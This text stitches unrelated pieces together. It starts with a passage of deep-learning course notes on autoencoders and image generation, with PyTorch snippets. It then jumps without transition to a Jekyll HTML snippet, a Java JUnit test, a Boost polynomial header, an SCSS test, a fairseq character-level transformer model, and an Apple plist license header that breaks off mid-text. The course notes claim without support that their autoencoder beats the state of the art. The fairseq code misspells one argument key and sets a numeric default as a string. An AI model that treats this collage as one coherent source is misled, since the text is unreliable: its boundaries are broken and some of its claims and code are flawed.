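A minimal sketch of the two interpolation schemes (the `encoder`/`decoder` names are illustrative and assume a trained pair):
```python=
import torch

def interpolate_pixels(x1, x2, t):
    # Pixel space: a plain cross-fade of the two images.
    return (1 - t) * x1 + t * x2

def interpolate_latents(x1, x2, t, encoder, decoder):
    # Latent space: blend the codes, then decode back to pixel space.
    z = (1 - t) * encoder(x1) + t * encoder(x2)
    return decoder(z)
```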
### Transformation examples
<center>
<img src="{{site.baseurl}}/images/week07/07-3/5_zoom1.jpg" height="120px"/><img src="{{site.baseurl}}/images/week07/07-3/5_zoom2.jpg" height="120px"/>
<br>
<b>Figure 5</b>: Zoom
</center>
<center>
<img src="{{site.baseurl}}/images/week07/07-3/6_shift1.jpg" height="120px"/><img src="{{site.baseurl}}/images/week07/07-3/6_shift2.jpg" height="120px"/>
<br>
<b>Figure 6</b>: Shift
</center>
<center>
<img src="{{site.baseurl}}/images/week07/07-3/7_bright1.jpg" height="120px"/><img src="{{site.baseurl}}/images/week07/07-3/7_bright2.jpg" height="120px"/>
<br>
<b>Figure 7</b>: Brightness
</center>
<center>
<img src="{{site.baseurl}}/images/week07/07-3/8_rotation1.jpg" height="120px"/><img src="{{site.baseurl}}/images/week07/07-3/8_rotation2.jpg" height="120px"/>
<br>
<b>Figure 8</b>: Rotation (note that the rotation could be in 3D)
</center>
### Image super-resolution
This model aims to upscale images and reconstruct the original faces. In Figure 9, from left to right, the first column is the 16x16 input image, the second is what you would get from a standard bicubic interpolation, the third is the output generated by the neural net, and on the right is the ground truth. (https://github.com/david-gpu/srez)
<center><img src="{{site.baseurl}}/images/week07/07-3/9_reconstruct.jpg" height="120px"/>
<br>
<b>Figure 9</b>: Reconstructing original faces
</center>
From the output images, it is clear that there exist biases in the training data, which make the reconstructed faces inaccurate. For example, the top-left Asian man's face is made to look European in the output due to the imbalanced proportions of training images, and the reconstructed face of the bottom-left woman looks weird due to the lack of training images taken from that odd angle.
### Image inpainting
<center>
<img src="{{site.baseurl}}/images/week07/07-3/10_facepatch.jpg" height="120px"/>
<br>
<b>Figure 10</b>: Putting a grey patch on a face
</center>
Putting a grey patch on a face, as in Figure 10, pushes the image away from the training manifold. The face reconstruction in Figure 11 is done by finding the closest sample image on the training manifold via energy-function minimization.
<center>
<img src="{{site.baseurl}}/images/week07/07-3/11_fixfacepatch.jpg" height="120px"/>
<br>
<b>Figure 11</b>: Reconstructed image of <b>Figure 10</b>
</center>
### Caption to image
<center>
<img src="{{site.baseurl}}/images/week07/07-3/12_caption.jpg" height="50px"/><img src="{{site.baseurl}}/images/week07/07-3/12_capimage.jpg" height="150px"/>
<br>
<b>Figure 12</b>: Caption to image
</center>
The translation from a text description to an image in Figure 12 is achieved by extracting text features that carry important visual information and then decoding them into an image.
## [What are autoencoders?](https://www.youtube.com/watch?v=bggWQ14DD9M&t=879s)
Autoencoders are artificial neural networks, trained in an unsupervised manner, that aim to first learn an encoded representation of our data and then generate the input data (as closely as possible) from the learned encoded representation. Thus, the output of an autoencoder is its prediction of its own input.
<center>
<img src="{{site.baseurl}}/images/week07/07-3/13_ae_structure.png" width="40%"/> <br>
<b>Figure 13</b>: Architecture of a basic autoencoder<br>
</center>
Figure 13 shows the architecture of a basic autoencoder. As before, we start from the bottom with the input $\boldsymbol{x}$, which is fed to an encoder (an affine transformation defined by $\boldsymbol{W_h}$, followed by squashing). This results in the intermediate hidden layer $\boldsymbol{h}$, which is fed to the decoder (another affine transformation, defined by $\boldsymbol{W_x}$, followed by another squashing). This produces the output $\boldsymbol{\hat{x}}$, which is our model's prediction/reconstruction of the input. As per our convention, we say that this is a 3-layer neural network.
We can represent the above network mathematically by using the following equations:
$$
\boldsymbol{h} = f(\boldsymbol{W_h}\boldsymbol{x} + \boldsymbol{b_h}) \\
\boldsymbol{\hat{x}} = g(\boldsymbol{W_x}\boldsymbol{h} + \boldsymbol{b_x})
$$
We also specify the following dimensionalities:
$$
\boldsymbol{x},\boldsymbol{\hat{x}} \in \mathbb{R}^n\\
\boldsymbol{h} \in \mathbb{R}^d\\
\boldsymbol{W_h} \in \mathbb{R}^{d \times n}\\
\boldsymbol{W_x} \in \mathbb{R}^{n \times d}\\
$$
<b>Note:</b> In order to represent PCA, we can have tied weights (exactly or approximately), defined by $\boldsymbol{W_x}\ \dot{=}\ \boldsymbol{W_h}^\top$.
The dotted equal sign above means "approximately equal to".
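A minimal sketch of such a tied-weight (PCA-like) autoencoder, using the dimensions $n$ and $d$ above (the parameter names here are illustrative, not from the lecture):
```python=
import torch
import torch.nn as nn
import torch.nn.functional as F

class TiedAutoencoder(nn.Module):
    def __init__(self, n, d):
        super().__init__()
        self.W_h = nn.Parameter(0.01 * torch.randn(d, n))  # shared weight matrix
        self.b_h = nn.Parameter(torch.zeros(d))
        self.b_x = nn.Parameter(torch.zeros(n))

    def forward(self, x):
        h = torch.tanh(F.linear(x, self.W_h, self.b_h))          # encoder
        return torch.tanh(F.linear(h, self.W_h.t(), self.b_x))   # decoder reuses W_h^T
```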
## Why do we use autoencoders?
At this point, you may wonder what the point of predicting the input is and what the applications of autoencoders are.
The primary applications of an autoencoder are anomaly detection and image denoising. We know that an autoencoder's task is to reconstruct data that lives on its training manifold. In other words, given a data manifold, we would like the autoencoder to be able to reconstruct only the inputs that exist on that manifold. We therefore constrain the model to reconstruct the things it has observed during training; as a result, any variation present in a new input is removed, because the model is insensitive to those kinds of perturbations.
Another application of autoencoders is image compression. If the layer after the input has a dimensionality $d$ that is lower than the input dimensionality $n$, the encoder can be used as a compressor: the hidden representation (coded representation) addresses all (or most) of the information in the input while taking up less space.
## Reconstruction loss
Let us now look at the reconstruction losses that we generally use. The overall loss for a dataset is the average per-sample loss, i.e.
$$
L = \frac{1}{m} \sum_{j=1}^m \ell(x^{(j)},\hat{x}^{(j)})
$$
When the input is categorical, we can use the cross-entropy loss to calculate the per-sample loss, given below:
$$
\ell(\boldsymbol{x},\boldsymbol{\hat{x}}) = -\sum_{i=1}^n [x_i \log(\hat{x}_i) + (1-x_i)\log(1-\hat{x}_i)]
$$
And when the input is real-valued, we may want to use the mean squared error loss, given below:
$$
\ell(\boldsymbol{x},\boldsymbol{\hat{x}}) = \frac{1}{2} \lVert \boldsymbol{x} - \boldsymbol{\hat{x}} \rVert^2
$$
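As a sketch, the two per-sample losses in PyTorch (assuming inputs flattened to shape `(batch, n)`, with values in $[0,1]$ for the cross-entropy case):
```python=
import torch
import torch.nn.functional as F

def ce_per_sample(x, x_hat):
    # Binary cross-entropy summed over the n components of each sample.
    return F.binary_cross_entropy(x_hat, x, reduction="none").sum(dim=1)

def mse_per_sample(x, x_hat):
    # Half the squared Euclidean distance, matching the formula above.
    return 0.5 * (x - x_hat).pow(2).sum(dim=1)
```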
## Under-/over-complete hidden layer
When the dimensionality $d$ of the hidden layer is lower than the dimensionality $n$ of the input, we say the hidden layer is under-complete. Likewise, when $d>n$, we call it an over-complete hidden layer. Figure 14 shows an under-complete hidden layer on the left and an over-complete one on the right.
<center>
<img src="{{site.baseurl}}/images/week07/07-3/14_over_under_complete.png" width="60%"/> <br>
<b>Figure 14</b>: An under-complete vs. an over-complete hidden layer<br>
</center>
As discussed above, an under-complete hidden layer can be used for compression, as we encode the information from the input into fewer dimensions. In an over-complete layer, on the other hand, we use an encoding with a higher dimensionality than the input.
Since we are trying to reconstruct the input, the model is prone to copying all of the input features into the hidden layer and passing them along as the output, in which case it essentially behaves as an identity function. This needs to be avoided, because it would mean the model learns nothing. Hence, we need to apply some constraints in the form of an information bottleneck: we constrain the configurations the hidden layer can take to only those seen during training. This allows a selective reconstruction (limited to a subset of the input space) and makes the model insensitive to everything not on the manifold.
Note that an under-complete layer cannot behave as an identity function, simply because the hidden layer does not have enough dimensions to copy the input. Thus an under-complete hidden layer is less likely to overfit than an over-complete one, but it can still overfit. For example, given a powerful encoder and decoder, the model could simply associate one number with each data point and learn that mapping. There are several methods to avoid overfitting, such as regularization methods, architectural methods, and others.
## Denoising autoencoder
Figure 15 shows the manifold of a denoising autoencoder and gives an intuition for how it works.
<center>
<img src="{{site.baseurl}}/images/week07/07-3/15_denoising_ae.png" width="500px" /><br>
<b>Figure 15</b>: Denoising autoencoder<br>
</center>
In this model, we inject the same noisy distribution we expect to observe in reality (i.e., data points pushed off the manifold by corruption), so that we can learn how to robustly recover from it.
By comparing the input and output, we can tell that the points already on the manifold did not move, while the points away from it moved a lot.
Figure 16 shows the relationship between the input data and the output data.
<center>
<img src="{{site.baseurl}}/images/week07/07-3/16_relation1.png" width="350px" />
<img src="{{site.baseurl}}/images/week07/07-3/16_relation2.png" width="330px" />
<br>
<b>Figure 16</b>: Input and output of the denoising autoencoder<br>
</center>
We can also use different colours to represent the distance each point moved; Figure 17 shows the resulting diagram.
<center>
<img src="{{site.baseurl}}/images/week07/07-3/17_distance.png" width="500px" /><br>
<b>Figure 17</b>: Measuring the traveling distance of the input data<br>
</center>
The lighter the colour, the longer the distance a point travelled. From the diagram, we can tell that the points at the corners travelled close to 1 unit, whereas the points within the two branches did not move at all, since they are attracted by the top and bottom branches during training.
## Contractive autoencoder
Figure 18 shows the loss function of the contractive autoencoder and the manifold.
<center>
<img src="{{site.baseurl}}/images/week07/07-3/18_contractive_ae.png" width="500px" /><br>
<b>Figure 18</b>: Contractive autoencoder <br>
</center>
The loss functional contains the reconstruction term plus the squared norm of the gradient of the hidden representation with respect to the input. Therefore, the overall loss minimizes the variation of the hidden layer under variations of the input. The benefit is that the model becomes sensitive to the directions needed for reconstruction while staying insensitive to all other possible directions.
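Written out as a formula (a sketch; $\lambda$ here is an assumed hyperparameter weighting the contraction penalty):
$$
\ell(\boldsymbol{x},\boldsymbol{\hat{x}}) = \lVert \boldsymbol{x} - \boldsymbol{\hat{x}} \rVert^2 + \lambda \lVert \nabla_{\boldsymbol{x}} \boldsymbol{h} \rVert^2
$$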
Figure 19 shows how these autoencoders work in general.
<center>
<img src="{{site.baseurl}}/images/week07/07-3/19_basic_ae.png" width="500px" /><br>
<b>Figure 19</b>: Basic autoencoder <br>
</center>
The training manifold is a single-dimensional object going in three dimensions. With $\boldsymbol{x}\in \boldsymbol{X}\subseteq\mathbb{R}^{n}$, the goal of the autoencoder is to stretch the curly line down into one dimension, where $\boldsymbol{z}\in \boldsymbol{Z}\subseteq\mathbb{R}^{d}$. As a result, a point from the input layer is transformed into a point in the latent layer. We now have a correspondence between points in the input space and points in the latent space, but not a correspondence between regions of the input space and regions of the latent space. Afterwards, we use the decoder to transform a point from the latent space to generate a meaningful output layer.
## [Implementing autoencoders - Notebook](https://www.youtube.com/watch?v=bggWQ14DD9M&t=2491s)
The Jupyter notebook can be found [here](https://github.com/Atcold/pytorch-Deep-Learning/blob/master/10-autoencoder.ipynb).
In this notebook, we implement a standard autoencoder and a denoising autoencoder and then compare their outputs.
### Defining the autoencoder model architecture and reconstruction loss
Using $28 \times 28$ images and a 30-dimensional hidden layer, the transformation routine is $784\to30\to784$. By applying the hyperbolic tangent function to the encoder and decoder routines, we are able to limit the output range to $(-1, 1)$. Mean squared error (MSE) loss is used as the loss function of this model.
```python=
class Autoencoder(nn.Module):
    def __init__(self):
        super().__init__()
        self.encoder = nn.Sequential(
            nn.Linear(n, d),
            nn.Tanh(),
        )
        self.decoder = nn.Sequential(
            nn.Linear(d, n),
            nn.Tanh(),
        )

    def forward(self, x):
        x = self.encoder(x)
        x = self.decoder(x)
        return x

model = Autoencoder().to(device)
criterion = nn.MSELoss()
```
### Train a standard autoencoder
To train a standard autoencoder using PyTorch, you need to put the following five methods in the training loop (a minimal sketch of the resulting loop follows the list):
#### Going forward:
1) Send the input image through the model by calling `output = model(img)`. <br>
2) Compute the loss using `criterion(output, img.data)`.
#### Going backward:
3) Clear the gradients, to make sure we do not accumulate their values, with `optimizer.zero_grad()`. <br>
4) Back-propagate with `loss.backward()`.<br>
5) Take an optimizer step with `optimizer.step()`.
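Putting the five steps together, the loop might look like this (a sketch; `dataloader`, `optimizer`, and `num_epochs` are assumed to be defined as in the notebook):
```python=
for epoch in range(num_epochs):
    for img, _ in dataloader:
        img = img.to(device).view(img.size(0), -1)  # flatten to (batch, 784)
        output = model(img)                  # 1) forward pass
        loss = criterion(output, img.data)   # 2) compute loss
        optimizer.zero_grad()                # 3) clear accumulated gradients
        loss.backward()                      # 4) back-propagate
        optimizer.step()                     # 5) update the parameters
```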
Figure 20 shows the output of the standard autoencoder.
<center>
<img src="{{site.baseurl}}/images/week07/07-3/21_output_stae.png" width="500px" /><br>
<b>Figure 20</b>: Output of the standard autoencoder <br>
</center>
<br/>
### Train a denoising autoencoder
For a denoising autoencoder, you need to add the following steps (a sketch combining them is given after the list):<br>
1) Call `nn.Dropout()` to randomly turn off neurons. <br>
2) Create the noise mask: `do(torch.ones(img.shape))`.<br>
3) Create bad images by multiplying the good images by the binary masks: `img_bad = (img * noise).to(device)`.
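Combining the three steps (a sketch; `do` is the `nn.Dropout()` module created in step 1, and note that dropout rescales the kept entries, so the mask is binary-like rather than strictly 0/1):
```python=
do = nn.Dropout()                      # 1) randomly turns entries off (rescaling the rest)
noise = do(torch.ones(img.shape))      # 2) the mask: zeros and scaled ones
img_bad = (img * noise).to(device)     # 3) the corrupted input
output = model(img_bad)
loss = criterion(output, img.data)     # the target is still the clean image
```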
Figure 21 shows the output of the denoising autoencoder.
<center>
<img src="{{site.baseurl}}/images/week07/07-3/22_out_denoising_ae.png" width="500px" /><br>
<b>Figure 21</b>: Output of the denoising autoencoder <br>
</center>
### Kernels comparison
It is important to note that, despite the fact that the dimension of the input layer is $28 \times 28 = 784$, a hidden layer with a dimension of 500 is still an over-complete layer, because of the number of black pixels in the images. Below are examples of kernels used in a trained under-complete standard autoencoder. Clearly, the pixels in the region where the digit exists indicate the detection of some sort of pattern, while the pixels outside of this region are basically random. This indicates that the standard autoencoder does not care about the pixels outside of the region where the digit is.
<center>
<img src="{{site.baseurl}}/images/week07/07-3/AE_kernels.png" style="zoom: 40%; background-color:#DCDCDC;" /><br>
<b>Figure 22:</b> Standard AE kernels.
</center>
On the other hand, when the same data is fed to a denoising autoencoder, where a dropout mask is applied to each image before fitting the model, something different happens. Every kernel that learns a pattern sets the pixels outside of the region where the digit exists to some constant value. Because a dropout mask is applied to the images, the model now cares about the pixels outside of the digit's region.
<center>
<img src="{{site.baseurl}}/images/week07/07-3/denoiser_kernels.png" style="zoom: 50%; background-color:#DCDCDC;" /><br>
<b>Figure 23:</b> Denoising AE kernels.
</center>
Compared to the state of the art, our autoencoder actually does better! You can see the results below.
<center>
<img src="{{site.baseurl}}/images/week07/07-3/AE_output.png" style="zoom: 40%; background-color:#DCDCDC;" /><br>
<b>Figure 24:</b> The input data (MNIST digits).
</center>
<center>
<img src="{{site.baseurl}}/images/week07/07-3/denoiser_output.png" style="zoom: 40%; background-color:#DCDCDC;" /><br>
<b>Figure 25:</b> Denoising AE reconstructions.
</center>
<center>
<img src="{{site.baseurl}}/images/week07/07-3/telea_output.png" style="zoom: 40%; background-color:#DCDCDC;" /><br>
<b>Figure 26:</b> Telea inpainting output.
</center>
<center>
<img src="{{site.baseurl}}/images/week07/07-3/navier-stokes_output.png" style="zoom: 40%; background-color:#DCDCDC;" /><br>
<b>Figure 27:</b> Navier-Stokes inpainting output.
</center>
---
title: Baseline
---
<div id="baseline" class="mb-large">
<h4><a href="#baseline">#baseline</a></h4>
<div style="height:calc(var(--spacing-base) * 20)" class="baseline bc-dark">
<div class="bc-secondary w-100 h-100"></div>
</div>
</div>
/*
* Copyright 2016, Stuart Douglas, and individual contributors as indicated
* by the @authors tag.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.fakereplace.integration.wildfly.autoupdate;
import java.io.File;
import java.net.URL;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.Collections;
import java.util.List;
import org.junit.Test;
/**
* @author Stuart Douglas
*/
public class ClassLoaderCompilerTestCase {
@Test
public void testCompiler() throws Exception {
try {
URL baseUrl = getClass().getClassLoader().getResource(".");
Path path = Paths.get(baseUrl.toURI());
Path base = path.resolve( ".." + File.separatorChar + ".." + File.separatorChar + "src" + File.separatorChar + "test" + File.separatorChar + "java");
List<String> data = Collections.singletonList(getClass().getName());
ClassLoaderCompiler compiler = new ClassLoaderCompiler(new ClassLoader(getClass().getClassLoader()) {
}, base, data); //the CL will be closed if it is not wrapped
compiler.compile();
} catch (Throwable e) {
e.printStackTrace();
throw new RuntimeException(e);
}
}
}
// (C) Copyright John Maddock 2007.
// Use, modification and distribution are subject to the
// Boost Software License, Version 1.0. (See accompanying file
// LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
//
// This file is machine generated, do not edit by hand
// Unrolled polynomial evaluation using second order Horner's rule
#ifndef BOOST_MATH_TOOLS_POLY_EVAL_6_HPP
#define BOOST_MATH_TOOLS_POLY_EVAL_6_HPP
namespace boost{ namespace math{ namespace tools{ namespace detail{
template <class T, class V>
inline V evaluate_polynomial_c_imp(const T*, const V&, const mpl::int_<0>*) BOOST_MATH_NOEXCEPT(V)
{
return static_cast<V>(0);
}
template <class T, class V>
inline V evaluate_polynomial_c_imp(const T* a, const V&, const mpl::int_<1>*) BOOST_MATH_NOEXCEPT(V)
{
return static_cast<V>(a[0]);
}
template <class T, class V>
inline V evaluate_polynomial_c_imp(const T* a, const V& x, const mpl::int_<2>*) BOOST_MATH_NOEXCEPT(V)
{
return static_cast<V>(a[1] * x + a[0]);
}
template <class T, class V>
inline V evaluate_polynomial_c_imp(const T* a, const V& x, const mpl::int_<3>*) BOOST_MATH_NOEXCEPT(V)
{
return static_cast<V>((a[2] * x + a[1]) * x + a[0]);
}
template <class T, class V>
inline V evaluate_polynomial_c_imp(const T* a, const V& x, const mpl::int_<4>*) BOOST_MATH_NOEXCEPT(V)
{
return static_cast<V>(((a[3] * x + a[2]) * x + a[1]) * x + a[0]);
}
template <class T, class V>
inline V evaluate_polynomial_c_imp(const T* a, const V& x, const mpl::int_<5>*) BOOST_MATH_NOEXCEPT(V)
{
V x2 = x * x;
V t[2];
t[0] = static_cast<V>(a[4] * x2 + a[2]);
t[1] = static_cast<V>(a[3] * x2 + a[1]);
t[0] *= x2;
t[0] += static_cast<V>(a[0]);
t[1] *= x;
return t[0] + t[1];
}
template <class T, class V>
inline V evaluate_polynomial_c_imp(const T* a, const V& x, const mpl::int_<6>*) BOOST_MATH_NOEXCEPT(V)
{
V x2 = x * x;
V t[2];
t[0] = a[5] * x2 + a[3];
t[1] = a[4] * x2 + a[2];
t[0] *= x2;
t[1] *= x2;
t[0] += static_cast<V>(a[1]);
t[1] += static_cast<V>(a[0]);
t[0] *= x;
return t[0] + t[1];
}
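// Usage sketch (illustrative): evaluate 1 + 2x + 3x^2 at x = 0.5 with the
// 3-coefficient overload above. In practice these _imp overloads are selected
// by the public boost::math::tools::evaluate_polynomial entry point rather
// than called directly.
//
//   double c[3] = { 1.0, 2.0, 3.0 };
//   double y = evaluate_polynomial_c_imp( c, 0.5, static_cast<const mpl::int_<3>* >(0) );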
}}}} // namespaces
#endif // include guard
$x: true;
@function foobar() {
@if $x {
$x: false;
@return foo;
}
@else {
$x: true;
@return bar;
}
}
div {
content: foobar();
content: foobar();
content: foobar();
content: foobar();
$x: false;
content: foobar();
}
#!/usr/bin/env python3
import logging
import math
from ast import literal_eval
import torch
import torch.nn as nn
import torch.nn.functional as F
from fairseq.models import (
FairseqEncoder,
register_model,
register_model_architecture,
transformer as fairseq_transformer,
)
from fairseq.modules import SinusoidalPositionalEmbedding
from pytorch_translate import char_encoder, transformer, utils, vocab_constants
from pytorch_translate.char_source_model import verify_pretrain_params
from pytorch_translate.common_layers import (
TransformerEncoderGivenEmbeddings,
VariableTracker,
)
from pytorch_translate.data.dictionary import TAGS
logger = logging.getLogger(__name__)
@register_model("char_source_transformer")
class CharSourceTransformerModel(transformer.TransformerModel):
def __init__(self, task, encoder, decoder):
super().__init__(task, encoder, decoder)
@staticmethod
def add_args(parser):
transformer.TransformerModel.add_args(parser)
parser.add_argument(
"--char-embed-dim",
type=int,
default=128,
metavar="N",
help=("Character embedding dimension."),
)
parser.add_argument(
"--char-cnn-params",
type=str,
metavar="EXPR",
help=("String experission, [(dim, kernel_size), ...]."),
)
parser.add_argument(
"--char-cnn-nonlinear-fn",
type=str,
default="tanh",
metavar="EXPR",
help=("Nonlinearity applied to char conv outputs. Values: relu, tanh."),
)
parser.add_argument(
"--char-cnn-num-highway-layers",
type=int,
default=0,
metavar="N",
help=("Char cnn encoder highway layers."),
)
parser.add_argument(
"--char-cnn-output-dim",
type=int,
default=-1,
metavar="N",
help="Output dim of the CNN layer. If set to -1, this is computed "
"from char-cnn-params.",
)
parser.add_argument(
"--use-pretrained-weights",
type=utils.bool_flag,
nargs="?",
const=True,
default=False,
help="Use pretrained weights for the character model including "
"the char embeddings, CNN filters, highway networks",
)
parser.add_argument(
"--finetune-pretrained-weights",
type=utils.bool_flag,
nargs="?",
const=True,
default=False,
help="Boolean flag to specify whether or not to update the "
"pretrained weights as part of training",
)
parser.add_argument(
"--pretrained-weights-file",
type=str,
default="",
help=("Weights file for loading pretrained weights"),
)
@classmethod
def build_model(cls, args, task):
"""Build a new model instance."""
src_dict, dst_dict = task.source_dictionary, task.target_dictionary
base_architecture(args)
assert hasattr(args, "char_source_dict_size"), (
"args.char_source_dict_size required. "
"should be set by load_binarized_dataset()"
)
if args.share_all_embeddings:
if src_dict != dst_dict:
raise RuntimeError(
"--share-all-embeddings requires a joined dictionary"
)
if args.encoder_embed_dim != args.decoder_embed_dim:
raise RuntimeError(
"--share-all-embeddings requires --encoder-embed-dim "
"to match --decoder-embed-dim"
)
if args.decoder_pretrained_embed and (
args.decoder_pretrained_embed != args.encoder_pretrained_embed
):
raise RuntimeError(
"--share-all-embeddings not compatible with "
"--decoder-pretrained-embed"
)
encoder_embed_tokens = transformer.build_embedding(
src_dict,
args.encoder_embed_dim,
args.encoder_pretrained_embed,
args.encoder_freeze_embed,
)
decoder_embed_tokens = encoder_embed_tokens
args.share_decoder_input_output_embed = True
else:
encoder_embed_tokens = transformer.build_embedding(
src_dict,
args.encoder_embed_dim,
args.encoder_pretrained_embed,
args.encoder_freeze_embed,
)
decoder_embed_tokens = transformer.build_embedding(
dst_dict,
args.decoder_embed_dim,
args.decoder_pretrained_embed,
args.decoder_freeze_embed,
)
args.embed_bytes = getattr(args, "embed_bytes", False)
# If we embed bytes then the number of indices is fixed and does not
# depend on the dictionary
if args.embed_bytes:
num_chars = vocab_constants.NUM_BYTE_INDICES + TAGS.__len__() + 1
else:
num_chars = args.char_source_dict_size
# In case use_pretrained_weights is true, verify the model params
# are correctly set
if args.embed_bytes and getattr(args, "use_pretrained_weights", False):
verify_pretrain_params(args)
encoder = CharCNNEncoder(
args,
src_dict,
encoder_embed_tokens,
num_chars=num_chars,
embed_dim=args.char_embed_dim,
char_cnn_params=args.char_cnn_params,
char_cnn_nonlinear_fn=args.char_cnn_nonlinear_fn,
char_cnn_num_highway_layers=args.char_cnn_num_highway_layers,
char_cnn_output_dim=getattr(args, "char_cnn_output_dim", -1),
use_pretrained_weights=getattr(args, "use_pretrained_weights", False),
finetune_pretrained_weights=getattr(
args, "finetune_pretrained_weights", False
),
weights_file=getattr(args, "pretrained_weights_file", ""),
)
decoder = transformer.TransformerDecoder(
args=args,
src_dict=src_dict,
dst_dict=dst_dict,
embed_tokens=decoder_embed_tokens,
)
return cls(task, encoder, decoder)
def forward(
self, src_tokens, src_lengths, char_inds, word_lengths, prev_output_tokens
):
"""
Overriding FairseqEncoderDecoderModel.forward() due to different encoder
inputs.
"""
encoder_out = self.encoder(src_tokens, src_lengths, char_inds, word_lengths)
decoder_out = self.decoder(prev_output_tokens, encoder_out)
return decoder_out
class CharCNNEncoder(FairseqEncoder):
"""
Character-level CNN encoder to generate word representations, as input to
transformer encoder.
"""
def __init__(
self,
args,
dictionary,
embed_tokens,
num_chars=50,
embed_dim=32,
char_cnn_params="[(128, 3), (128, 5)]",
char_cnn_nonlinear_fn="tanh",
char_cnn_num_highway_layers=0,
char_cnn_output_dim=-1,
use_pretrained_weights=False,
finetune_pretrained_weights=False,
weights_file=None,
):
super().__init__(dictionary)
convolutions_params = literal_eval(char_cnn_params)
self.char_cnn_encoder = char_encoder.CharCNNModel(
dictionary,
num_chars,
embed_dim,
convolutions_params,
char_cnn_nonlinear_fn,
char_cnn_num_highway_layers,
char_cnn_output_dim,
use_pretrained_weights,
finetune_pretrained_weights,
weights_file,
)
self.embed_tokens = embed_tokens
token_embed_dim = embed_tokens.embedding_dim
self.word_layer_norm = nn.LayerNorm(token_embed_dim)
char_embed_dim = (
char_cnn_output_dim
if char_cnn_output_dim != -1
else sum(out_dim for (out_dim, _) in convolutions_params)
)
self.char_layer_norm = nn.LayerNorm(char_embed_dim)
self.word_dim = char_embed_dim + token_embed_dim
self.char_scale = math.sqrt(char_embed_dim / self.word_dim)
self.word_scale = math.sqrt(token_embed_dim / self.word_dim)
if self.word_dim != args.encoder_embed_dim:
self.word_to_transformer_embed = fairseq_transformer.Linear(
self.word_dim, args.encoder_embed_dim
)
self.dropout = args.dropout
self.padding_idx = dictionary.pad()
self.embed_positions = fairseq_transformer.PositionalEmbedding(
1024,
args.encoder_embed_dim,
self.padding_idx,
learned=args.encoder_learned_pos,
)
self.transformer_encoder_given_embeddings = TransformerEncoderGivenEmbeddings(
args=args, proj_to_decoder=True
)
# Variable tracker
self.tracker = VariableTracker()
# Initialize adversarial mode
self.set_gradient_tracking_mode(False)
self.set_embed_noising_mode(False)
# disables sorting and word-length thresholding if True
# (enables ONNX tracing of length-sorted input with batch_size = 1)
self.onnx_export_model = False
def prepare_for_onnx_export_(self):
self.onnx_export_model = True
def set_gradient_tracking_mode(self, mode=True):
""" This allows AdversarialTrainer to turn on retrain_grad when
running adversarial example generation model."""
self.tracker.reset()
self.track_gradients = mode
def set_embed_noising_mode(self, mode=True):
"""This allows adversarial trainer to turn on and off embedding noising
layers. In regular training, this mode is off, and it is not included
in forward pass.
"""
self.embed_noising_mode = mode
def forward(self, src_tokens, src_lengths, char_inds, word_lengths):
self.tracker.reset()
# char_inds has shape (batch_size, max_words_per_sent, max_word_len)
bsz, seqlen, maxchars = char_inds.size()
# char_cnn_encoder takes input (max_word_length, total_words)
char_inds_flat = char_inds.view(-1, maxchars).t()
# output (total_words, encoder_dim)
char_cnn_output = self.char_cnn_encoder(char_inds_flat)
x = char_cnn_output.view(bsz, seqlen, char_cnn_output.shape[-1])
x = x.transpose(0, 1) # (seqlen, bsz, char_cnn_output_dim)
x = self.char_layer_norm(x)
x = self.char_scale * x
embedded_tokens = self.embed_tokens(src_tokens)
# (seqlen, bsz, token_embed_dim)
embedded_tokens = embedded_tokens.transpose(0, 1)
embedded_tokens = self.word_layer_norm(embedded_tokens)
embedded_tokens = self.word_scale * embedded_tokens
x = torch.cat([x, embedded_tokens], dim=2)
self.tracker.track(x, "token_embeddings", retain_grad=self.track_gradients)
# T x B x C -> B x T x C
x = x.transpose(0, 1)
if self.word_to_transformer_embed is not None:
x = self.word_to_transformer_embed(x)
positions = self.embed_positions(src_tokens)
x += positions
x = F.dropout(x, p=self.dropout, training=self.training)
# B x T x C -> T x B x C
x = x.transpose(0, 1)
# compute padding mask (B x T)
encoder_padding_mask = src_tokens.eq(self.padding_idx)
if not encoder_padding_mask.any():
encoder_padding_mask = None
x = self.transformer_encoder_given_embeddings(
x=x, positions=positions, encoder_padding_mask=encoder_padding_mask
)
if self.onnx_export_model and encoder_padding_mask is None:
encoder_padding_mask = torch.Tensor([]).type_as(src_tokens)
return x, src_tokens, encoder_padding_mask
def reorder_encoder_out(self, encoder_out, new_order):
(x, src_tokens, encoder_padding_mask) = encoder_out
if x is not None:
x = x.index_select(1, new_order)
if src_tokens is not None:
src_tokens = src_tokens.index_select(0, new_order)
if encoder_padding_mask is not None:
encoder_padding_mask = encoder_padding_mask.index_select(0, new_order)
return (x, src_tokens, encoder_padding_mask)
def max_positions(self):
"""Maximum input length supported by the encoder."""
return self.embed_positions.max_positions
def upgrade_state_dict(self, state_dict):
if isinstance(self.embed_positions, SinusoidalPositionalEmbedding):
if "encoder.embed_positions.weights" in state_dict:
del state_dict["encoder.embed_positions.weights"]
state_dict["encoder.embed_positions._float_tensor"] = torch.FloatTensor(1)
return state_dict
@register_model_architecture("char_source_transformer", "char_source_transformer")
def base_architecture(args):
# default architecture
transformer.base_architecture(args)
args.char_cnn_params = getattr(args, "char_cnn_params", "[(50, 1), (100,2)]")
args.char_cnn_nonlinear_fn = getattr(args, "chr_cnn_nonlinear_fn", "relu")
args.char_cnn_num_highway_layers = getattr(args, "char_cnn_num_highway_layers", "2")
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>FILEHEADER</key>
<string>
/*
Copyright (c) ___YEAR___, Apple Inc. All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation and/or
other materials provided with the distribution.
3. Neither the name of the copyright holder(s) nor the names of any contributors
may be used to endorse or promote products derived from this software without
specific prior written permission. No license is granted to the trademarks of
the copyright holders even if such marks are included in this software.
